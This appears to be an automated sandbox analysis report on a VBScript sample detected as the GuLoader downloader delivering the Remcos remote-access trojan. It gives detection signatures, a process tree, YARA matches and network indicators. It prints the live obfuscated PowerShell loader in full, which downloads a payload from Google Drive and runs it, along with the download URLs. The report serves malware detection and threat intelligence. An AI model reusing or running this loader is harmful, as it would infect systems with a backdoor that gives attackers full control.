Windows Analysis Report
CO894GOV2O25.vbs

Overview

General Information

Sample name: CO894GOV2O25.vbs
Analysis ID: 1633356
MD5: 3ab38d8e692322e55deb91ea33e8305d
SHA1: eeca584df47dca8a53769ed5a8a76223eefb401c
SHA256: dc8799d45d113dd0f36ecd532c6bf3a1040d29ec296bfcce82a9d1d88f17b762
Tags: vbs, user-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Potential evasive VBS script found (sleep loop)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 4212 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CO894GOV2O25.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • PING.EXE (PID: 7340 cmdline: ping Host_6637.6637.6637.657e MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7424 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Taltegns;function janey($Naturprodukt){ .($Glassliberes) ($Naturprodukt)} function Infractor($Naturalization){$Reacquainted129=4;do{$Cozies104+=$Naturalization[$Reacquainted129];$Reacquainted129+=5;$Bemoil=Format-List} until(!$Naturalization[$Reacquainted129])$Cozies104}$Vagttaarnenes=Infractor 'W xbNparaeCentTR ck. Blow';$Vagttaarnenes+=Infractor 'Ba nEPjevbAwakc,arelTobaIBlepESqu NSprot';$Dysbulic=Infractor 'TekrMGroooMindzafpriSirilD bil DigaDa b/';$Altnglerne92=Infractor 'Imp TEthylFremsGrap1Spot2';$Segregerede=' Rig[MaksNNe,oEBechtB.ro.p.gwS k peKam.rIsagvAandiForpC SpeeVaskPSpgeorelai PhoNkompTHumoM.eroa m rnSangA alcG Rele BilRAlop]smre:Kiss: ejssCbfte sivc Su UOpharKar i ongTPen yAgnopHarlr.ariOnecet F.ro.jenCMjesoCollLRime=D.mp$WencaEscalPhostOvernBaneGTolvLScraESaldRU,pfNSgetE Asy9flyw2';$Dysbulic+=Infractor ' fre5S,rg. Car0Opse Resi(SygeW S.ci FlynPseudSpekoM.ljwK lvsUl.i ModuN iceT Unv Barn1Homo0Trib.Biod0Be i;Be t cod,WCar ih llnBefo6Mist4Nonn;Krad FripxF rs6apra4Stan;Rec. MarrArvevClas:Rhod1Ufo 3 Fol4 Opf.Unif0L vs)Ud a SickG erceMasocTrogk,onroGen,/Gono2,igo0K,pi1mass0U.in0 Dal1Fiel0 ata1 Ent B,deFOv,riPar rIne.eOve f oico Mi xSuda/ We 1Knig3Macu4 Sco.Ko t0';$Quillaias180=Infractor 'LocauSlagsBakkE Exirtogd-in dAHjlpgUn,ee He NUnunT';$Aabningstidernes=Infractor ' upmhKeglt .rntLe,sptri s Til: hor/San /OctadKnsfrMik.i sliv Ante U.u. ,legEft oquafoPolyg Prol nae Aut.S,idcCorroJug mOffe/ Re u KatcSpl ? 
,loeMe axRi,dpUnd,oSp,rrSaldtLion=Un vdErhvoConcw abnEpiclskovoMissaKunsd Fro&UnsaiAntidOpsu=Aspa1Dep,yIron_Fr gMPennUEndo1.matISammxMelotUmrkx ,uiQUdhuaMoraDU.ign,wee_KundfFi a6Sala5 VicC HornLouv0 T gb FerFSti 8BedlLChlof,isc0.tlnXBuscC I o8AldeUCong0U deI';$Rotationspumperne=Infractor ' Ugi>';$Glassliberes=Infractor 'DormitilieV weX';$Eliquating='Gulvs';$Klatrende='\Udskilleres.Bre';janey (Infractor ',itr$OutcGUnscl KelO ,ncBnoneaResulAad,:,rspiC azN F,lTSpeer .blaOceaVrem E AscnSchcs ill= et$ElkaEWar nE.chvRdbe:NoncaLas.P UndpDiamDNegra FortInadaSylv+Skry$ yrbkarseLSalmAf rgTUnpir AirESc.rNSkrad esE');janey (Infractor ' Erk$PhysgBenzLHemaOArkobLokaaR adlSkul:LudwMS riIGratCCharM OctAStatcSmre=R fu$IngeaAnesa esBLillnSandiplynN mregAgenS A aT uttiCappDFu,dE,forRhollN Unfeu,shS Nay.KerySTriepHer LOgleILdenT ag(ev,j$Popur telO Best GalASo ntAuxiIRegrOPerfn munSTillPSam uAlvemSerpp Ac,eWarprLandN Pg ED,fr)');janey (Infractor $Segregerede);$Aabningstidernes=$Micmac[0];$Bayer=(Infractor 'cler$ ensgSyg.ltrocoUndebBaneAVavaLPluk: indeAlinmchilUA delNonpGSti.eNonfrRedbi outNCafeGpho eU taRT leNBarrECoenSOgr,= ,lbnCompE,ehaWGr n-uncaOinteB QabJScenEOutfCDoubTRen. 
tabeSReb.yPoleSsup,tOpbeEDy fMExpo.Iv.k$ RapvPlebA igeGPa it ,ipt .leaErgoaClu r ricnHfl EFo bN MelEpa,ls');janey ($Bayer);janey (Infractor 'L.fg$Frafe obemBi.su.onsl ,cagKa.eeMenurSpe,imochnUn,eg.rikeFor rKruknseyceUndusOmbr.Mo aH Rame,nuaaDupldPa le Oekr.edisNeph[Barm$ ilaQSvaruGra iExtrlBetyl BucaRosmi ,veaan vs S p1D.lg8D,to0D sc]Obte=Vent$TydeDFlaay TitsAntibPropuU sylStefiOrbic');$Bestuknes=Infractor 'Red $Theae AmymDeltuMunil Ve gPoime RearUdpiiPushnBegrg StoeTaj,r.ogsnA omePrimsIndi.mo oDtynwoG.newMilln P,olarbeoFrkaaSimidBuk F.ueriFer,lBelaeVrdi(circ$DigeAFo vaUnchbIndknIdoliPr snHorogBrissDefetBl.niThrudSkrueF rvrSkoln ereRup s nd,Unre$ DiaQP nsuHjema rtedS.acr D,muMethpTantoFhvslMiljaFaatrHypn)';$Quadrupolar=$Intravens;janey (Infractor ' ,is$Tvr,GAmorl OveOShivbMyreA A.glThio: dbrAAutofConah oadaCon aAnter caoe SurnRedeDstjgE,dli=Spe (SkoltSnubeEcstss utTCoun-Kam P MaraDic t rchhoppu Kha$HaneQHu,euCo.la A adNonhrCondU argp iblOBedmlM roaSu.fRNurs)');while (!$Afhaarende) {janey (Infractor 'Ga,t$Tvisg SymlEjenoHjdebT ntaCovelRepa: SveTMas uPampmHoselIndkeoverpVolflPh,waBib dAcets HaneSvrdrH ftnMiljeGribs.ydr=B in$AnsaSAllocLineaUdn.pWa,ru SellCoima') ;janey $Bestuknes;janey (Infractor ' Non[TilrtSkruhKinsRGeneeRad a Slid C,aiUdlaN SubgRegn.EtioT GasHMedvRC loE rkaUndedIndb]C rm:Gemm: ilosveksLStorEScapEChifpArga(Itch4Komp0 Pe 0S ri0st,e)');janey (Infractor ' Ov.$Paing St LUn eoSkalBtoxia SlalFord:Ba eAjehoFSemohH rlARimma ,knrToneeint n akvd BasECast=Tegn(WagnTOvereJokks alltB.rn- lodp kdsAMu.dT So,H rag Eddi$ .laqUntaU RovaFracDBri rModauClerPSkanO Pr lNonea mbyR Cin)') ;janey (Infractor 'L.go$BrneGDiscl MonOCalcb .amAOlshlsobe: T,kbB okRStatUj degHellS OmsRMortEA.caTOeco=Mod,$ThiogFriklEkstORe mbIneaAErkllLend: tjer H re CoaM Te.oTripnHjadtSvidePilaRTs riSe iN M ngSemie istRBhutnRumkERede+Both+ D p%Jas $ HunmOmveILnnicFameMGracATr,hCKu s.PancC ksOM.niuBasensamlt') ;$Aabningstidernes=$Micmac[$Brugsret]}$Aroideous208=323081;$Eneboers=29797;janey (Infractor 
'Bude$FoerGSas,lAbanOFjerb St,a.alsllign:UtrimFar aSl,kCHorsKSkriLProgeMeso pos=Blen brieGWiike KantTant- .lsCCindOIsacnVelsTFadeeGrubNRenhTW.er Dyne$.uboqUnunU enoADelmDCarpRKlasUBir,pUn mo.heslInteALievr');janey (Infractor 'Ta,r$Polyg Gral P,loUnbrbOpskaSavol Sem:Tan SNon oSg kl rwdcDis rMonaeOutrmunspePi irH.ndsSulf Padd=Amat N.n[U anSnon y HovsAbsetUdpleSpitmUndi.BlanC F eoSkrinEna v Pe ePrefr MurtKl d]Aftg:A lo:KongFSurcr Undo ilim laBKu ea TemsTaboe vi6Fora4 NonSDip.tNga r roi StenBu tg ,ac( Top$DollMTrana TercKonsk Berl AndeMeas)');janey (Infractor 'A hv$AfruGFatnlIndoOFlyeBIsomaDes LRewa:UndeSAdvoY Forn nsaCDeceoGestp v.daT detchirEB.aisMi k Fre = nte Praa[ BssSMagnY.andSBlodTFngseBrugmSter.PesttLangeGa iXPro.tsymp. ordebo bnExpecJuleOD.laD KanIFyrsn E igfutu] Sek:Un.p:FranaEksis VgtC rgli PoliDau..SteggUtereV nitSdcesFre,T Sagr.oqui rinSengg una(Rh d$Nects .ecoErnhlA skCDep rExpaeStramInt.eAfreRBallSBurg)');janey (Infractor 'Lepi$Stj gDruplUngeONud bTi,fA ndsl any:AnarB HypoProvgEnv dOveraForvGMoraeAeronprin= Teg$ M.dSUdtmY IllNHockCBrudO MaiP kemaP thT Co,ETroms E p.VitrsmetauJu,ebBoidsSeveT Botr Di i fhuNMi pG Ver(A tn$DoucAAl aRA,toOLigniBesvd Sk,E RejoDa luPl ySHv,d2Tr k0Blom8styl,Cu h$Elice StiNAareeNon BSpolo ,inEPianR SorSDepu)');janey $Bogdagen;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7816 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" [obfuscated command line omitted; it repeats the command line of PID 7424 above] MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 8184 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 2152 cmdline: "C:\Windows\System32\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source: 0000000C.00000002.1963821003.0000000008110000.00000040.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Author: Joe Security
Source: 00000010.00000002.2186165556.00000000098DD000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security
Source: 0000000C.00000002.1949177684.00000000054D3000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Author: Joe Security
Source: 0000000C.00000002.1963956226.000000000C5F3000.00000040.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Author: Joe Security
Source: 00000009.00000002.1540197391.0000013ADEC14000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Author: Joe Security
Source: amsi64_7424.amsi.csv, Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Author: Joe Security
Source: amsi64_7424.amsi.csv, Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen, Strings:
              • 0xfc45:$b2: ::FromBase64String(
              • 0xcfb0:$s1: -join
              • 0x675c:$s4: +=
              • 0x681e:$s4: +=
              • 0xaa45:$s4: +=
              • 0xcb62:$s4: +=
              • 0xce4c:$s4: +=
              • 0xcf92:$s4: +=
              • 0xf347:$s4: +=
              • 0xf3c7:$s4: +=
              • 0xf48d:$s4: +=
              • 0xf50d:$s4: +=
              • 0xf6e3:$s4: +=
              • 0xf767:$s4: +=
              • 0xd7cf:$e4: Get-WmiObject
              • 0xd9be:$e4: Get-Process
              • 0xda16:$e4: Start-Process
Source: amsi32_7816.amsi.csv, Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen, Strings:
              • 0xa7be:$b2: ::FromBase64String(
              • 0x9848:$s1: -join
              • 0x2ff4:$s4: +=
              • 0x30b6:$s4: +=
              • 0x72dd:$s4: +=
              • 0x93fa:$s4: +=
              • 0x96e4:$s4: +=
              • 0x982a:$s4: +=
              • 0x1360d:$s4: +=
              • 0x1368d:$s4: +=
              • 0x13753:$s4: +=
              • 0x137d3:$s4: +=
              • 0x139a9:$s4: +=
              • 0x13a2d:$s4: +=
              • 0xa067:$e4: Get-WmiObject
              • 0xa256:$e4: Get-Process
              • 0xa2ae:$e4: Start-Process
              • 0x142af:$e4: Get-Process

              System Summary

Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CO894GOV2O25.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CO894GOV2O25.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 496, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CO894GOV2O25.vbs", ProcessId: 4212, ProcessName: wscript.exe
Source: Network Connection, Author: frack113, Data: DestinationIp: 216.58.212.174, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 8184, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49697
Source: Process started, Author: Michael Haag, Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CO894GOV2O25.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CO894GOV2O25.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 496, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CO894GOV2O25.vbs", ProcessId: 4212, ProcessName: wscript.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated command line omitted; it repeats the PID 7424 entry in the process tree above and is cut off in this record]
Timestamp: 2025-03-10T09:19:11.043519+0100, SID: 2803305, Severity: 3, Classtype: Unknown Traffic, Source IP: 192.168.2.6, Source Port: 49689, Destination IP: 216.58.212.174, Destination Port: 443, Protocol: TCP
Timestamp: 2025-03-10T09:20:18.261217+0100, SID: 2803270, Severity: 2, Classtype: Potentially Bad Traffic, Source IP: 192.168.2.6, Source Port: 49697, Destination IP: 216.58.212.174, Destination Port: 443, Protocol: TCP

              AV Detection

Source: Yara match, File source: 00000010.00000002.2186165556.00000000098DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 97.7% probability
Source: unknown, HTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.6:49688 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.6:49690 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.6:49697 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.6:49698 version: TLS 1.2
              Source: Binary string: ystem.pdb source: powershell.exe, 00000009.00000002.1510863986.0000013ACCFD2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: .pdb.hz source: powershell.exe, 00000009.00000002.1547484456.0000013AE7139000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbh source: powershell.exe, 0000000C.00000002.1954822321.0000000006E60000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: bpdbtem.pdb source: powershell.exe, 00000009.00000002.1510863986.0000013ACCFD2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl source: powershell.exe, 00000009.00000002.1547484456.0000013AE711C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: stem.Core.pdb source: powershell.exe, 0000000C.00000002.1954822321.0000000006E60000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe, Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

Source: C:\Windows\System32\wscript.exe, Process created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657e
Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=1y_MU1IxtxQaDn_f65Cn0bF8Lf0XC8U0I HTTP/1.1, Host: drive.google.com
Source: global traffic, HTTP traffic detected: GET /download?id=1y_MU1IxtxQaDn_f65Cn0bF8Lf0XC8U0I&export=download HTTP/1.1, Host: drive.usercontent.google.com, Connection: Keep-Alive
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49697 -> 216.58.212.174:443
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49689 -> 216.58.212.174:443
Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=1y_MU1IxtxQaDn_f65Cn0bF8Lf0XC8U0I HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0, Host: drive.google.com, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=179yeRSPIWYmvgjVo15SJW1KN3hF-txYZ HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0, Host: drive.google.com, Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /download?id=179yeRSPIWYmvgjVo15SJW1KN3hF-txYZ&export=download HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0, Cache-Control: no-cache, Host: drive.usercontent.google.com, Connection: Keep-Alive
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: Host_6637.6637.6637.657e
Source: global traffic, DNS traffic detected: DNS query: drive.google.com
Source: global traffic, DNS traffic detected: DNS query: drive.usercontent.google.com
              Source: powershell.exe, 00000009.00000002.1512336299.0000013ACEDC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com
              Source: powershell.exe, 00000009.00000002.1512336299.0000013AD02DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1y_MU1IxtxQaDn_f65Cn0bF8Lf0XC8U0I
              Source: powershell.exe, 00000009.00000002.1512336299.0000013ACEDC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1y_MU1IxtxQaDn_f65Cn0bF8Lf0XC8U0IP
              Source: powershell.exe, 0000000C.00000002.1926844713.0000000004527000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1y_MU1IxtxQaDn_f65Cn0bF8Lf0XC8U0IXR1l
              Source: powershell.exe, 00000009.00000002.1512336299.0000013ACF03F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com
              Source: powershell.exe, 00000009.00000002.1512336299.0000013ACF03F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1512336299.0000013ACF149000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1y_MU1IxtxQaDn_f65Cn0bF8Lf0XC8U0I&export=download
              Source: powershell.exe, 00000009.00000002.1512336299.0000013ACEDC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000009.00000002.1540197391.0000013ADEC14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000009.00000002.1512336299.0000013ACF024000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1512336299.0000013ACF03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1512336299.0000013ACF03F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
              Source: powershell.exe, 00000009.00000002.1512336299.0000013ACF024000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1512336299.0000013ACF03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1512336299.0000013ACF03F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
              Source: powershell.exe, 00000009.00000002.1512336299.0000013ACF024000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1512336299.0000013ACF03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1512336299.0000013ACF03F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
              Source: powershell.exe, 00000009.00000002.1512336299.0000013ACF024000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1512336299.0000013ACF03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1512336299.0000013ACF03F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
              Source: powershell.exe, 00000009.00000002.1512336299.0000013ACF024000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1512336299.0000013ACF03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1512336299.0000013ACF03F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49689
              Source: unknown Network traffic detected: HTTP traffic on port 49698 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49688
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49698
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49697
              Source: unknown Network traffic detected: HTTP traffic on port 49697 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49690
              Source: unknown Network traffic detected: HTTP traffic on port 49689 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49690 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49688 -> 443
              Source: unknown HTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.6:49688 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.6:49690 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.6:49697 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.6:49698 version: TLS 1.2

              E-Banking Fraud

              Source: Yara match File source: 00000010.00000002.2186165556.00000000098DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              System Summary

              Source: amsi64_7424.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi32_7816.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7424, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7816, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Taltegns;function janey($Naturprodukt){ .($Glassliberes) ($Naturprodukt)} function Infractor($Naturalization){$Reacquainted129=4;do{$Cozies104+=$Naturalization[$Reacquainted129];$Reacquainted129+=5;$Bemoil=Format-List} until(!$Naturalization[$Reacquainted129])$Cozies104}$Vagttaarnenes=Infractor 'W xbNparaeCentTR ck. Blow';$Vagttaarnenes+=Infractor 'Ba nEPjevbAwakc,arelTobaIBlepESqu NSprot';$Dysbulic=Infractor 'TekrMGroooMindzafpriSirilD bil DigaDa b/';$Altnglerne92=Infractor 'Imp TEthylFremsGrap1Spot2';$Segregerede=' Rig[MaksNNe,oEBechtB.ro.p.gwS k peKam.rIsagvAandiForpC SpeeVaskPSpgeorelai PhoNkompTHumoM.eroa m rnSangA alcG Rele BilRAlop]smre:Kiss: ejssCbfte sivc Su UOpharKar i ongTPen yAgnopHarlr.ariOnecet F.ro.jenCMjesoCollLRime=D.mp$WencaEscalPhostOvernBaneGTolvLScraESaldRU,pfNSgetE Asy9flyw2';$Dysbulic+=Infractor ' fre5S,rg. Car0Opse Resi(SygeW S.ci FlynPseudSpekoM.ljwK lvsUl.i ModuN iceT Unv Barn1Homo0Trib.Biod0Be i;Be t cod,WCar ih llnBefo6Mist4Nonn;Krad FripxF rs6apra4Stan;Rec. MarrArvevClas:Rhod1Ufo 3 Fol4 Opf.Unif0L vs)Ud a SickG erceMasocTrogk,onroGen,/Gono2,igo0K,pi1mass0U.in0 Dal1Fiel0 ata1 Ent B,deFOv,riPar rIne.eOve f oico Mi xSuda/ We 1Knig3Macu4 Sco.Ko t0';$Quillaias180=Infractor 'LocauSlagsBakkE Exirtogd-in dAHjlpgUn,ee He NUnunT';$Aabningstidernes=Infractor ' upmhKeglt .rntLe,sptri s Til: hor/San /OctadKnsfrMik.i sliv Ante U.u. ,legEft oquafoPolyg Prol nae Aut.S,idcCorroJug mOffe/ Re u KatcSpl ? 
